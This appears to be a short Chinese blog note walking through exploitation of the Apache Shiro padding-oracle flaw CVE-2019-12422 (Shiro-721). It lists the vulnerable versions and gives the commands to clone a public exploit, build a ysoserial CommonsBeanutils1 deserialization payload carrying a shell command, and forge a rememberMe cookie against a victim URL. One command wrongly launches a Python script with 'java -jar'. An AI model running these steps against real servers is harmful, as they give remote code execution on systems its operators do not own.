【笔记】CVE-2019-12422漏洞利用

前言

通过frohoff/ysoserialinspiringz/Shiro-721实现Shiro-721漏洞利用

漏洞利用前提

  • Shiro 1.2.5
  • Shiro 1.2.6
  • Shiro 1.3.0
  • Shiro 1.3.1
  • Shiro 1.3.2
  • Shiro 1.4.0-RC2
  • Shiro 1.4.0
  • Shiro 1.4.1

下载项目

1
2
git clone https://github.com/inspiringz/Shiro-721.git
cd Shiro-721

利用ysoserial生成payload

传送门

1
java -jar ysoserial-all.jar CommonsBeanutils1 "<shell>" > x.class

根据旧Cookie生成新的Cookie

  • 通过浏览器获取名为rememberMe的Cookie值

  • 利用旧的Cookie,自动爆破密钥,并根据ysoserial生成payload,生成新的Cookie

此操作会持续多个小时发送请求,可能会对服务器造成影响

<url>:受害者URL
<cookie_old>:旧的Cookie值
x.class:ysoserial生成的payload

1
java -jar shiro_exp.py <url> <cookie_old> x.class
  • 替换旧的Cookie为新的Cookie

完成